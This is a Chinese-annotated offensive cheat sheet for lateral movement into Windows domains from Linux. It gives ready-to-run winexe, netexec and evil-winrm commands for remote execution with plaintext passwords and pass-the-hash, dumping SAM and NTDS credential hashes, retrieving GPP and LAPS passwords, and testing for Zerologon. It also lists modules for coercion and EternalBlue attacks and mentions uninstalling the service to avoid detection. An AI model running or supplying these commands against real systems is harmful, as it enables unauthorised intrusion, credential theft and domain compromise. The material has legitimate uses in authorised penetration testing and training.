Linux_LateralMovement
1. Winexe
-U 设置用户名和密码参数
Administrator%P@ssw0rd 主机用户名和密码,通过%进行分割
–uninstall 是在退出被控主机时,会自动卸载winexe服务,防止被发现
//127.0.0.1 设置ip地址的格式
command cmd.exe最后为指定运行程序
winexe -U offensive/Administrator%Password@ --uninstall //192.168.3.200 cmd.exe //返回控制台
winexe -U offensive/Administrator%Password@ --uninstall //192.168.3.200 "whoami /user"
2. netexec
smb Command(编码)
netexec smb 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec gbk
smb Command(编码)
cme smb 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec=gbk
smb Command PTH
netexec smb 192.168.3.110 -u Administrator -H 'ccef208c6485269c20db2cad21734fe7' -x "whoami /user" --codec gbk
smb PowerShell Command
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk -X '$PSVersionTable'
smb exec-method smbexec,wmiexec,mmcexec,atexec
–exec-method {smbexec,wmiexec,mmcexec,atexec}
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method smbexec -x "whoami"
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method mmcexec -x "whoami"
netexec smb 192.168.3.110 -u Administrator -p Admin12345 –exec-method atexec -x “whoami”
winrm Command
netexec winrm 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec gbk
sam dump
netexec winrm 192.168.3.110 -u Administrator -p Admin12345 --sam --codec gbk
smb dump ntds hash
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --ntds --codec gbk
smb dump ntds hash log
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --ntds --log offensive.log --codec gbk
smb dump ntds hash log(成功率比较低)
netexec smb 192.168.3.110 -u Administrator -p Admin12345 -M ntdsutil --codec gbk
pass-pol
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --pass-pol
brute disks
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --disks
loggedon-users
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --loggedon-users
ldap query
netexec ldap 192.168.3.110 -u Administrator -p Admin12345 --query "(samAccountName=dbadmin)" ""
ldap query1
netexec ldap 192.168.3.110 -u Administrator -p Admin12345 --query "(samAccountName=dbadmin)" "sAMAccountName pwdLastSet"
netexec smb -L
└─$ netexec smb -L
LOW PRIVILEGE MODULES
[*] add-computer Adds or deletes a domain computer
[*] dfscoerce Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc Drop a searchConnector-ms file on each writable share
[*] enum_av Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)
[*] enum_ca Anonymously uses RPC endpoints to hunt for ADCS CAs
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] ms17-010 MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT
[*] nopac Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] petitpotam Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] printerbug Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion.
[*] printnightmare Check if host vulnerable to printnightmare
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky Creates windows shortcuts with the icon attribute containing a URI to the specified server (default SMB) in all shares with write permissions
[*] spider_plus List files recursively and save a JSON share-file metadata to the 'OUTPUT_FOLDER'. See module options for finer configuration.
[*] spooler Detect if print spooler is enabled or not
[*] webdav Checks whether the WebClient service is running on the target
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
netexec smb zerologon
netexec smb 192.168.3.110 -u dbadmin -p Admin12345 -M zerologon
netexec ldap -L
└─$ netexec ldap -L
LOW PRIVILEGE MODULES
[*] adcs Find PKI Enrollment Services in Active Directory and Certificate Templates Names
[*] daclread Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options.
[*] enum_trusts Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
[*] find-computer Finds computers in the domain via the provided text
[*] get-desc-users Get description of the users. May contained password
[*] get-network Query all DNS records with the corresponding IP from the domain.
[*] get-unixUserPassword Get unixUserPassword attribute from all users in ldap
[*] get-userPassword Get userPassword attribute from all users in ldap
[*] group-mem Retrieves all the members within a Group
[*] groupmembership Query the groups to which a user belongs.
[*] laps Retrieves all LAPS passwords which the account has read permissions for.
[*] ldap-checker Checks whether LDAP signing and binding are required and / or enforced
[*] maq Retrieves the MachineAccountQuota domain-level attribute
[*] obsolete Extract all obsolete operating systems from LDAP
[*] pso Module to get the Fine Grained Password Policy/PSOs
[*] subnets Retrieves the different Sites and Subnets of an Active Directory
[*] user-desc Get user descriptions stored in Active Directory
[*] whoami Get details of provided user
netexec ldap maq
netexec ldap 192.168.3.110 -u Administrator -p Admin12345 -M maq
netexec ldap whoami
netexec ldap get-network
netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M get-network
netexec ldap adcs
netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M adcs
netexec ldap trusts
netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M enum_trusts
3.evil-winrm
evil-winrm -i 192.168.3.110 -u Administrator -p Admin12345
